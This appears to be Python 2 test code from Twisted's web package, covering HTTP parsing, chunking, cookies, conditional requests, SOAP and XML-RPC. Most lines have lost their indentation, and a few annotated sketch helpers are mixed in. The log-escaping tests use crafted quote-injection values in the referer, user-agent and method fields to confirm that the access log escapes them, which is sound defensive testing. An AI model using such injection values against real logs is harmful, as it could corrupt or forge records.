client.handleEndHeaders = self._handleEndHeaders
client.handleStatus = self._handleStatus
d = loopback.loopbackAsync(server, client)
d.addCallback(self._cbTestLoopback)
return d
def _cbTestLoopback(self, ignored):
if not (self.gotStatus and self.gotResponse and self.gotEndHeaders):
raise RuntimeError(
"didn't got all callbacks %s"
% [self.gotStatus, self.gotResponse, self.gotEndHeaders])
del self.gotEndHeaders
del self.gotResponse
del self.gotStatus
del self.numHeaders
class PRequest:
"""Dummy request for persistence tests."""
def __init__(self, **headers):
self.received_headers = headers
self.headers = {}
def getHeader(self, k):
return self.received_headers.get(k, '')
def setHeader(self, k, v):
self.headers[k] = v
class PersistenceTestCase(unittest.TestCase):
"""Tests for persistent HTTP connections."""
ptests = [#(PRequest(connection="Keep-Alive"), "HTTP/1.0", 1, {'connection' : 'Keep-Alive'}),
(PRequest(), "HTTP/1.0", 0, {'connection': None}),
(PRequest(connection="close"), "HTTP/1.1", 0, {'connection' : 'close'}),
(PRequest(), "HTTP/1.1", 1, {'connection': None}),
(PRequest(), "HTTP/0.9", 0, {'connection': None}),
]
def testAlgorithm(self):
c = http.HTTPChannel()
for req, version, correctResult, resultHeaders in self.ptests:
result = c.checkPersistence(req, version)
self.assertEquals(result, correctResult)
for header in resultHeaders.keys():
self.assertEquals(req.headers.get(header, None), resultHeaders[header])
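# Illustrative sketch (assumption, not part of the original test module): the
# persistence rules exercised by ptests above boil down to a small decision
# function.  The name shouldPersist and its signature are made up here.
def shouldPersist(version, connectionHeader):
    """Return 1 if the connection may be kept open after the response."""
    if version == "HTTP/1.1" and connectionHeader != "close":
        # HTTP/1.1 defaults to persistent unless the client asks to close.
        return 1
    # HTTP/1.0 (without Keep-Alive handling here) and HTTP/0.9 never persist.
    return 0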
class ChunkingTestCase(unittest.TestCase):
strings = ["abcv", "", "fdfsd423", "Ffasfas\r\n",
"523523\n\rfsdf", "4234"]
def testChunks(self):
for s in self.strings:
self.assertEquals((s, ''), http.fromChunk(''.join(http.toChunk(s))))
self.assertRaises(ValueError, http.fromChunk, '-5\r\nmalformed!\r\n')
def testConcatenatedChunks(self):
chunked = ''.join([''.join(http.toChunk(t)) for t in self.strings])
result = []
buffer = ""
for c in chunked:
buffer = buffer + c
try:
data, buffer = http.fromChunk(buffer)
result.append(data)
except ValueError:
pass
self.assertEquals(result, self.strings)
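# Illustrative sketch (assumption, not Twisted's implementation): the chunk
# framing exercised above is "<hex length>\r\n<data>\r\n".  These two helpers
# mirror that wire format for clarity; the names are invented for this example.
def exampleToChunk(data):
    return "%x\r\n%s\r\n" % (len(data), data)
def exampleFromChunk(buf):
    """Parse one chunk, returning (data, remaining buffer)."""
    lengthLine, rest = buf.split("\r\n", 1)
    length = int(lengthLine, 16)
    if length < 0:
        raise ValueError("chunk length must not be negative")
    if rest[length:length + 2] != "\r\n":
        raise ValueError("chunk must end with CRLF")
    return rest[:length], rest[length + 2:]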
class ParsingTestCase(unittest.TestCase):
def runRequest(self, httpRequest, requestClass, success=1):
httpRequest = httpRequest.replace("\n", "\r\n")
b = StringIOWithoutClosing()
a = http.HTTPChannel()
a.requestFactory = requestClass
a.makeConnection(protocol.FileWrapper(b))
# one byte at a time, to stress it.
for byte in httpRequest:
if a.transport.closed:
break
a.dataReceived(byte)
a.connectionLost(IOError("all done"))
if success:
self.assertEquals(self.didRequest, 1)
del self.didRequest
else:
self.assert_(not hasattr(self, "didRequest"))
def testBasicAuth(self):
testcase = self
class Request(http.Request):
l = []
def process(self):
testcase.assertEquals(self.getUser(), self.l[0])
testcase.assertEquals(self.getPassword(), self.l[1])
for u, p in [("foo", "bar"), ("hello", "there:z")]:
Request.l[:] = [u, p]
s = "%s:%s" % (u, p)
f = "GET / HTTP/1.0\nAuthorization: Basic %s\n\n" % (s.encode("base64").strip(), )
self.runRequest(f, Request, 0)
def testTooManyHeaders(self):
httpRequest = "GET / HTTP/1.0\n"
for i in range(502):
httpRequest += "%s: foo\n" % i
httpRequest += "\n"
class MyRequest(http.Request):
def process(self):
raise RuntimeError, "should not get called"
self.runRequest(httpRequest, MyRequest, 0)
def testHeaders(self):
httpRequest = """\
GET / HTTP/1.0
Foo: bar
baz: 1 2 3
"""
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.getHeader('foo'), 'bar')
testcase.assertEquals(self.getHeader('Foo'), 'bar')
testcase.assertEquals(self.getHeader('bAz'), '1 2 3')
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testCookies(self):
"""
Test cookies parsing and reading.
"""
httpRequest = '''\
GET / HTTP/1.0
Cookie: rabbit="eat carrot"; ninja=secret; spam="hey 1=1!"
'''
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.getCookie('rabbit'), '"eat carrot"')
testcase.assertEquals(self.getCookie('ninja'), 'secret')
testcase.assertEquals(self.getCookie('spam'), '"hey 1=1!"')
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testGET(self):
httpRequest = '''\
GET /?key=value&multiple=two+words&multiple=more%20words&empty= HTTP/1.0
'''
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.method, "GET")
testcase.assertEquals(self.args["key"], ["value"])
testcase.assertEquals(self.args["empty"], [""])
testcase.assertEquals(self.args["multiple"], ["two words", "more words"])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def test_extraQuestionMark(self):
"""
While only a single '?' is allowed in a URL, many other servers
accept more than one and pass everything after the first through as
part of the query arguments. Test that we emulate this behavior.
"""
httpRequest = 'GET /foo?bar=?&baz=quux HTTP/1.0\n\n'
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEqual(self.method, 'GET')
testcase.assertEqual(self.path, '/foo')
testcase.assertEqual(self.args['bar'], ['?'])
testcase.assertEqual(self.args['baz'], ['quux'])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testPOST(self):
query = 'key=value&multiple=two+words&multiple=more%20words&empty='
httpRequest = '''\
POST / HTTP/1.0
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
%s''' % (len(query), query)
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.method, "POST")
testcase.assertEquals(self.args["key"], ["value"])
testcase.assertEquals(self.args["empty"], [""])
testcase.assertEquals(self.args["multiple"], ["two words", "more words"])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testMissingContentDisposition(self):
req = '''\
POST / HTTP/1.0
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 103
--AaB03x
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
abasdfg
--AaB03x--
'''
self.runRequest(req, http.Request, success=False)
class QueryArgumentsTestCase(unittest.TestCase):
def testUnquote(self):
try:
from twisted.protocols import _c_urlarg
except ImportError:
raise unittest.SkipTest("_c_urlarg module is not available")
# work exactly like urllib.unquote, including stupid things
# % followed by a non-hexdigit in the middle and in the end
self.failUnlessEqual(urllib.unquote("%notreally%n"),
_c_urlarg.unquote("%notreally%n"))
# % followed by hexdigit, followed by non-hexdigit
self.failUnlessEqual(urllib.unquote("%1quite%1"),
_c_urlarg.unquote("%1quite%1"))
# unquoted text, followed by some quoted chars, ends in a trailing %
self.failUnlessEqual(urllib.unquote("blah%21%40%23blah%"),
_c_urlarg.unquote("blah%21%40%23blah%"))
# Empty string
self.failUnlessEqual(urllib.unquote(""), _c_urlarg.unquote(""))
def testParseqs(self):
self.failUnlessEqual(cgi.parse_qs("a=b&d=c;+=f"),
http.parse_qs("a=b&d=c;+=f"))
self.failUnlessRaises(ValueError, http.parse_qs, "blah",
strict_parsing = 1)
self.failUnlessEqual(cgi.parse_qs("a=&b=c", keep_blank_values = 1),
http.parse_qs("a=&b=c", keep_blank_values = 1))
self.failUnlessEqual(cgi.parse_qs("a=&b=c"),
http.parse_qs("a=&b=c"))
def testEscchar(self):
try:
from twisted.protocols import _c_urlarg
except ImportError:
raise unittest.SkipTest("_c_urlarg module is not available")
self.failUnlessEqual("!@#+b",
_c_urlarg.unquote("+21+40+23+b", "+"))
class ClientDriver(http.HTTPClient):
def handleStatus(self, version, status, message):
self.version = version
self.status = status
self.message = message
class ClientStatusParsing(unittest.TestCase):
def testBaseline(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201 foo')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, 'foo')
def testNoMessage(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, '')
def testNoMessage_trailingSpace(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201 ')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, '')
```
#### File: web/test/test_soap.py
```python
try:
import SOAPpy
except ImportError:
SOAPpy = None
class SOAPPublisher: pass
else:
from twisted.web import soap
SOAPPublisher = soap.SOAPPublisher
from twisted.trial import unittest
from twisted.web import server, error
from twisted.internet import reactor, defer
class Test(SOAPPublisher):
def soap_add(self, a, b):
return a + b
def soap_kwargs(self, a=1, b=2):
return a + b
soap_kwargs.useKeywords=True
def soap_triple(self, string, num):
return [string, num, None]
def soap_struct(self):
return SOAPpy.structType({"a": "c"})
def soap_defer(self, x):
return defer.succeed(x)
def soap_deferFail(self):
return defer.fail(ValueError())
def soap_fail(self):
raise RuntimeError
def soap_deferFault(self):
return defer.fail(ValueError())
def soap_complex(self):
return {"a": ["b", "c", 12, []], "D": "foo"}
def soap_dict(self, map, key):
return map[key]
class SOAPTestCase(unittest.TestCase):
def setUp(self):
self.publisher = Test()
self.p = reactor.listenTCP(0, server.Site(self.publisher),
interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return soap.Proxy("http://127.0.0.1:%d/" % self.port)
def testResults(self):
inputOutput = [
("add", (2, 3), 5),
("defer", ("a",), "a"),
("dict", ({"a": 1}, "a"), 1),
("triple", ("a", 1), ["a", 1, None])]
dl = []
for meth, args, outp in inputOutput:
d = self.proxy().callRemote(meth, *args)
d.addCallback(self.assertEquals, outp)
dl.append(d)
# SOAPpy kinda blows.
d = self.proxy().callRemote('complex')
d.addCallback(lambda result: result._asdict())
d.addCallback(self.assertEquals, {"a": ["b", "c", 12, []], "D": "foo"})
dl.append(d)
# We now return to our regularly scheduled program, already in progress.
return defer.DeferredList(dl, fireOnOneErrback=True)
def testMethodNotFound(self):
"""
Check that a non-existent method returns error 500.
"""
d = self.proxy().callRemote('doesntexist')
self.assertFailure(d, error.Error)
def cb(err):
self.assertEquals(int(err.status), 500)
d.addCallback(cb)
return d
def testLookupFunction(self):
"""
Test lookupFunction method on publisher, to see available remote
methods.
"""
self.assertTrue(self.publisher.lookupFunction("add"))
self.assertTrue(self.publisher.lookupFunction("fail"))
self.assertFalse(self.publisher.lookupFunction("foobar"))
if not SOAPpy:
SOAPTestCase.skip = "SOAPpy not installed"
```
#### File: web/test/test_web.py
```python
from twisted.trial import unittest
import string, random, copy
from cStringIO import StringIO
from twisted.web import server, resource, util
from twisted.internet import defer, interfaces, error
from twisted.web import http
from twisted.protocols import loopback
from twisted.python import log, reflect
from twisted.internet.address import IPv4Address
from zope.interface import implements
class DummyRequest:
uri='http://dummy/'
method = 'GET'
def getHeader(self, h):
return None
def registerProducer(self, prod,s):
self.go = 1
while self.go:
prod.resumeProducing()
def unregisterProducer(self):
self.go = 0
def __init__(self, postpath, session=None):
self.sitepath = []
self.written = []
self.finished = 0
self.postpath = postpath
self.prepath = []
self.session = None
self.protoSession = session or server.Session(0, self)
self.args = {}
self.outgoingHeaders = {}
def setHeader(self, name, value):
"""TODO: make this assert on write() if the header is content-length
"""
self.outgoingHeaders[name.lower()] = value
def getSession(self):
if self.session:
return self.session
assert not self.written, "Session cannot be requested after data has been written."
self.session = self.protoSession
return self.session
def write(self, data):
self.written.append(data)
def finish(self):
self.finished = self.finished + 1
def addArg(self, name, value):
self.args[name] = [value]
def setResponseCode(self, code):
assert not self.written, "Response code cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
def setLastModified(self, when):
assert not self.written, "Last-Modified cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
def setETag(self, tag):
assert not self.written, "ETag cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
class ResourceTestCase(unittest.TestCase):
def testListEntities(self):
r = resource.Resource()
self.failUnlessEqual([], r.listEntities())
class SimpleResource(resource.Resource):
def render(self, request):
if http.CACHED in (request.setLastModified(10),
request.setETag('MatchingTag')):
return ''
else:
return "correct"
class SiteTest(unittest.TestCase):
def testSimplestSite(self):
sres1 = SimpleResource()
sres2 = SimpleResource()
sres1.putChild("",sres2)
site = server.Site(sres1)
assert site.getResourceFor(DummyRequest([''])) is sres2, "Got the wrong resource."
class SessionTest(unittest.TestCase):
def setUp(self):
self.site = server.Site(SimpleResource())
def test_delayedCallCleanup(self):
"""Checking to make sure Sessions do not leave extra DelayedCalls.
"""
from twisted.internet import reactor
delayedCallsBeforeSession = repr(reactor.getDelayedCalls())
session = self.site.makeSession()
session.touch()
session.expire()
self.failUnlessEqual(delayedCallsBeforeSession,
repr(reactor.getDelayedCalls()))
# Conditional requests:
# If-None-Match, If-Modified-Since
# make conditional request:
# normal response if condition succeeds
# if condition fails:
# response code
# no body
def httpBody(whole):
return whole.split('\r\n\r\n', 1)[1]
def httpHeader(whole, key):
key = key.lower()
headers = whole.split('\r\n\r\n', 1)[0]
for header in headers.split('\r\n'):
if header.lower().startswith(key):
return header.split(':', 1)[1].strip()
return None
def httpCode(whole):
l1 = whole.split('\r\n', 1)[0]
return int(l1.split()[1])
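# Illustrative usage (assumption, not part of the original tests): the helpers
# above slice a raw response so a test can assert on the status line, a single
# header and the body; for a 304 revalidation the body should be empty.  The
# function name below is made up for this example and is never called here.
def _exampleConditionalResponse():
    raw = ("HTTP/1.1 304 Not Modified\r\n"
           "ETag: MatchingTag\r\n"
           "\r\n")
    assert httpCode(raw) == 304
    assert httpHeader(raw, "ETag") == "MatchingTag"
    assert httpBody(raw) == ""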
class ConditionalTest(unittest.TestCase):
"""web.server's handling of conditional requests for cache validation."""
# XXX: test web.distrib.
def setUp(self):
self.resrc = SimpleResource()
self.resrc.putChild('', self.resrc)
self.site = server.Site(self.resrc)
self.site.logFile = log.logfile
# HELLLLLLLLLLP! This harness is Very Ugly.
self.channel = self.site.buildProtocol(None)
self.transport = http.StringTransport()
self.transport.close = lambda *a, **kw: None
self.transport.disconnecting = lambda *a, **kw: 0
self.transport.getPeer = lambda *a, **kw: "peer"
self.transport.getHost = lambda *a, **kw: "host"
self.channel.makeConnection(self.transport)
for l in ["GET / HTTP/1.1",
"Accept: text/html"]:
self.channel.lineReceived(l)
def tearDown(self):
self.channel.connectionLost(None)
def test_modified(self):
"""If-Modified-Since cache validator (positive)"""
self.channel.lineReceived("If-Modified-Since: %s"
% http.datetimeToString(1))
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_unmodified(self):
"""If-Modified-Since cache validator (negative)"""
self.channel.lineReceived("If-Modified-Since: %s"
% http.datetimeToString(100))
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
def test_etagMatchedNot(self):
"""If-None-Match ETag cache validator (positive)"""
self.channel.lineReceived("If-None-Match: unmatchedTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_etagMatched(self):
"""If-None-Match ETag cache validator (negative)"""
self.channel.lineReceived("If-None-Match: MatchingTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpHeader(result, "ETag"), "MatchingTag")
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
from twisted.web import google
class GoogleTestCase(unittest.TestCase):
def testCheckGoogle(self):
raise unittest.SkipTest("no violation of google ToS")
d = google.checkGoogle('site:www.twistedmatrix.com twisted')
d.addCallback(self.assertEquals, 'http://twistedmatrix.com/')
return d
from twisted.web import static
from twisted.web import script
class StaticFileTest(unittest.TestCase):
def testStaticPaths(self):
import os
dp = os.path.join(self.mktemp(),"hello")
ddp = os.path.join(dp, "goodbye")
tp = os.path.abspath(os.path.join(dp,"world.txt"))
tpy = os.path.join(dp,"wyrld.rpy")
os.makedirs(dp)
f = open(tp,"wb")
f.write("hello world")
f = open(tpy, "wb")
f.write("""
from twisted.web.static import Data
resource = Data('dynamic world','text/plain')
""")
f = static.File(dp)
f.processors = {
'.rpy': script.ResourceScript,
}
f.indexNames = f.indexNames + ['world.txt']
self.assertEquals(f.getChild('', DummyRequest([''])).path,
tp)
self.assertEquals(f.getChild('wyrld.rpy', DummyRequest(['wyrld.rpy'])
).__class__,
static.Data)
f = static.File(dp)
wtextr = DummyRequest(['world.txt'])
wtext = f.getChild('world.txt', wtextr)
self.assertEquals(wtext.path, tp)
wtext.render(wtextr)
self.assertEquals(wtextr.outgoingHeaders.get('content-length'),
str(len('hello world')))
self.assertNotEquals(f.getChild('', DummyRequest([''])).__class__,
static.File)
def testIgnoreExt(self):
f = static.File(".")
f.ignoreExt(".foo")
self.assertEquals(f.ignoredExts, [".foo"])
f = static.File(".")
self.assertEquals(f.ignoredExts, [])
f = static.File(".", ignoredExts=(".bar", ".baz"))
self.assertEquals(f.ignoredExts, [".bar", ".baz"])
def testIgnoredExts(self):
import os
dp = os.path.join(self.mktemp(), 'allYourBase')
fp = os.path.join(dp, 'AreBelong.ToUs')
os.makedirs(dp)
open(fp, 'wb').write("Take off every 'Zig'!!")
f = static.File(dp)
f.ignoreExt('.ToUs')
dreq = DummyRequest([''])
child_without_ext = f.getChild('AreBelong', dreq)
self.assertNotEquals(child_without_ext, f.childNotFound)
class DummyChannel:
class TCP:
port = 80
def getPeer(self):
return IPv4Address("TCP", 'client.example.com', 12344)
def getHost(self):
return IPv4Address("TCP", 'example.com', self.port)
class SSL(TCP):
implements(interfaces.ISSLTransport)
transport = TCP()
site = server.Site(resource.Resource())
class TestRequest(unittest.TestCase):
def testChildLink(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'bar/baz')
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar/', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'baz')
def testPrePathURLSimple(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
request.setHost('example.com', 80)
self.assertEqual(request.prePathURL(), 'http://example.com/foo/bar')
def testPrePathURLNonDefault(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:81/foo/bar')
def testPrePathURLSSLPort(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:443/foo/bar')
def testPrePathURLSSLPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com/foo/bar')
def testPrePathURLHTTPPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 80
request = server.Request(d, 1)
request.setHost('example.com', 80)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:80/foo/bar')
def testPrePathURLSSLNonDefault(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:81/foo/bar')
def testPrePathURLSetSSLHost(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('foo.com', 81, 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://foo.com:81/foo/bar')
def testNotifyFinishConnectionLost(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
request = server.Request(d, 1)
finished = request.notifyFinish()
request.connectionLost(error.ConnectionDone("Connection done"))
return self.assertFailure(finished, error.ConnectionDone)
class RootResource(resource.Resource):
isLeaf=0
def getChildWithDefault(self, name, request):
request.rememberRootURL()
return resource.Resource.getChildWithDefault(self, name, request)
def render(self, request):
return ''
class RememberURLTest(unittest.TestCase):
def createServer(self, r):
chan = DummyChannel()
chan.transport = DummyChannel.TCP()
chan.site = server.Site(r)
return chan
def testSimple(self):
r = resource.Resource()
r.isLeaf=0
rr = RootResource()
r.putChild('foo', rr)
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(r)
for url in ['/foo/', '/foo/bar', '/foo/bar/baz', '/foo/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/foo")
def testRoot(self):
rr = RootResource()
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(rr)
for url in ['/', '/bar', '/bar/baz', '/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/")
class NewRenderResource(resource.Resource):
def render_GET(self, request):
return "hi hi"
def render_HEH(self, request):
return "ho ho"
class NewRenderTestCase(unittest.TestCase):
def _getReq(self):
d = DummyChannel()
d.site.resource.putChild('newrender', NewRenderResource())
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
return request
def testGoodMethods(self):
req = self._getReq()
req.requestReceived('GET', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'hi hi')
req = self._getReq()
req.requestReceived('HEH', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'ho ho')
def testBadMethods(self):
req = self._getReq()
req.requestReceived('CONNECT', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
req = self._getReq()
req.requestReceived('hlalauguG', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
def testImplicitHead(self):
req = self._getReq()
req.requestReceived('HEAD', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 200)
self.assertEquals(-1, req.transport.getvalue().find('hi hi'))
class SDResource(resource.Resource):
def __init__(self,default): self.default=default
def getChildWithDefault(self,name,request):
d=defer.succeed(self.default)
return util.DeferredResource(d).getChildWithDefault(name, request)
class SDTest(unittest.TestCase):
def testDeferredResource(self):
r = resource.Resource()
r.isLeaf = 1
s = SDResource(r)
d = DummyRequest(['foo', 'bar', 'baz'])
resource.getChildForRequest(s, d)
self.assertEqual(d.postpath, ['bar', 'baz'])
class DummyRequestForLogTest(DummyRequest):
uri='/dummy' # parent class uri has "http://", which doesn't really happen
code = 123
client = '1.2.3.4'
clientproto = 'HTTP/1.0'
sentLength = None
def __init__(self, *a, **kw):
DummyRequest.__init__(self, *a, **kw)
self.headers = {}
def getHeader(self, h):
return self.headers.get(h.lower(), None)
def getClientIP(self):
return self.client
class TestLogEscaping(unittest.TestCase):
def setUp(self):
self.site = http.HTTPFactory()
self.site.logFile = StringIO()
self.request = DummyRequestForLogTest(self.site, False)
def testSimple(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "-"\n')
def testMethodQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.method = 'G"T'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "G\\"T /dummy HTTP/1.0" 123 - "-" "-"\n')
def testRequestQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.uri='/dummy"withquote'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy\\"withquote HTTP/1.0" 123 - "-" "-"\n')
def testProtoQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.clientproto='HT"P/1.0'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HT\\"P/1.0" 123 - "-" "-"\n')
def testRefererQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['referer'] = 'http://malicious" ".website.invalid'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "http://malicious\\" \\".website.invalid" "-"\n')
def testUserAgentQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['user-agent'] = 'Malicious Web" Evil'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "Malicious Web\\" Evil"\n')
```
#### File: web/test/test_xmlrpc.py
```python
try:
import xmlrpclib
except ImportError:
xmlrpclib = None
class XMLRPC: pass
else:
from twisted.web import xmlrpc
from twisted.web.xmlrpc import XMLRPC, addIntrospection
from twisted.trial import unittest
from twisted.web import server, static
from twisted.internet import reactor, defer
from twisted.python import log
import time
class TestRuntimeError(RuntimeError):
pass
class TestValueError(ValueError):
pass
class Test(XMLRPC):
FAILURE = 666
NOT_FOUND = 23
SESSION_EXPIRED = 42
# the doc string is part of the test
def xmlrpc_add(self, a, b):
"""This function add two numbers."""
return a + b
xmlrpc_add.signature = [['int', 'int', 'int'],
['double', 'double', 'double']]
# the doc string is part of the test
def xmlrpc_pair(self, string, num):
"""This function puts the two arguments in an array."""
return [string, num]
xmlrpc_pair.signature = [['array', 'string', 'int']]
# the doc string is part of the test
def xmlrpc_defer(self, x):
"""Help for defer."""
return defer.succeed(x)
def xmlrpc_deferFail(self):
return defer.fail(TestValueError())
# don't add a doc string, it's part of the test
def xmlrpc_fail(self):
raise TestRuntimeError
def xmlrpc_fault(self):
return xmlrpc.Fault(12, "hello")
def xmlrpc_deferFault(self):
return defer.fail(xmlrpc.Fault(17, "hi"))
def xmlrpc_complex(self):
return {"a": ["b", "c", 12, []], "D": "foo"}
def xmlrpc_dict(self, map, key):
return map[key]
def _getFunction(self, functionPath):
try:
return XMLRPC._getFunction(self, functionPath)
except xmlrpc.NoSuchFunction:
if functionPath.startswith("SESSION"):
raise xmlrpc.Fault(self.SESSION_EXPIRED, "Session non-existent/expired.")
else:
raise
xmlrpc_dict.help = 'Help for dict.'
class TestAuthHeader(Test):
"""
This is used to get the header info so that we can test
authentication.
"""
def __init__(self):
Test.__init__(self)
self.request = None
def render(self, request):
self.request = request
return Test.render(self, request)
def xmlrpc_authinfo(self):
return self.request.getUser(), self.request.getPassword()
class XMLRPCTestCase(unittest.TestCase):
def setUp(self):
self.p = reactor.listenTCP(0, server.Site(Test()),
interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d/" % self.port)
def testResults(self):
inputOutput = [
("add", (2, 3), 5),
("defer", ("a",), "a"),
("dict", ({"a": 1}, "a"), 1),
("pair", ("a", 1), ["a", 1]),
("complex", (), {"a": ["b", "c", 12, []], "D": "foo"})]
dl = []
for meth, args, outp in inputOutput:
d = self.proxy().callRemote(meth, *args)
d.addCallback(self.assertEquals, outp)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
def testErrors(self):
dl = []
for code, methodName in [(666, "fail"), (666, "deferFail"),
(12, "fault"), (23, "noSuchMethod"),
(17, "deferFault"), (42, "SESSION_TEST")]:
d = self.proxy().callRemote(methodName)
d = self.assertFailure(d, xmlrpc.Fault)
d.addCallback(lambda exc, code=code: self.assertEquals(exc.faultCode, code))
dl.append(d)
d = defer.DeferredList(dl, fireOnOneErrback=True)
